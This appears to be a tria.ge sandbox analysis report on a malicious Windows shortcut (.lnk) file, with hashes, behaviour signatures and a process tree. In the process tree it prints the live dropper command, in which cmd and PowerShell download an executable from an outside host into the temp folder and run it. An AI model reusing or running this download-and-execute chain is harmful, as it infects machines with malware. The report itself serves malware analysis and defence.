Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/02/2023, 13:36

General

  • Target

    43843_8439_8329098.lnk

  • Size

    130KB

  • MD5

    2fcb95c29131b2bdb9f864f492a3bcd1

  • SHA1

    7ffa77710ae6a95b3759643852a5a829c550a36e

  • SHA256

    36a4e3cebb2ed11077cca219e6033a31a60fc8924ed48b79e216d4ceefcc08f5

  • SHA512

    a527d90b15ce7556ae167aba16cfbda8d213b87ec8d2e095ba57060ae7af3315de7bfcbbaddca8e7ad4ff8c7f6a40f5f9e3b8bdea25292a24f2d31740368baa7

  • SSDEEP

    3072:EE+n8y1Bzt+mwV4jUs8Nu+GEodNn6/f1DaiSGeQnHkJ6U:EE+nPvxwV28NTGEoEAbGXHM6U

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\43843_8439_8329098.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3228
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /R set U=http:/&powershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"&"C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sys&C:\Users\Admin\AppData\Local\Temp/Up&g3Jerl:+hqw^-BdjJd&cjM34{_________
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5008
      • C:\Program Files\windows nt\accessories\wordpad.exe
        "C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sys
        3⤵
        • Suspicious use of SetWindowsHookEx
        PID:2132
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
    1⤵
      PID:4876

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/5008-134-0x00000216FEC70000-0x00000216FEC92000-memory.dmp

      Filesize

      136KB

    • memory/5008-135-0x00007FFF39CB0000-0x00007FFF3A771000-memory.dmp

      Filesize

      10.8MB

    • memory/5008-136-0x00007FFF39CB0000-0x00007FFF3A771000-memory.dmp

      Filesize

      10.8MB

    • memory/5008-137-0x00007FFF39CB0000-0x00007FFF3A771000-memory.dmp

      Filesize

      10.8MB